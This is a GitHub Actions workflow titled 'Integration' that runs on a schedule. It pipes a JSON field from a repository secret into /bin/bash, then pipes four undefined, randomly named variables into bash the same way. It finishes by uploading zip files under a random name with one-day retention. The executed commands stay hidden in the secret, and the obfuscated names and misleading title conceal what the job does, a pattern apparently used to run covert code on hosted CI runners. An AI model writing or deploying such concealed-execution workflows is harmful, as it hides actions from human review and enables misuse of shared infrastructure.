name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '40 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          ota027: ${{ secrets.ota027 }}
        run: |
          printf '%s' "$ota027" | jq -r .ujr6 | /bin/bash
          echo $wm1164 | jq -r .rjz3049 | /bin/bash
          echo $xw2895 | jq -r .ftwi46525 | /bin/bash
          echo $p276 | jq -r .mdw5 | /bin/bash
          echo $wafo83239 | jq -r .zmz770 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: XVUNJqeU
          path: "*.zip"
          retention-days: 1
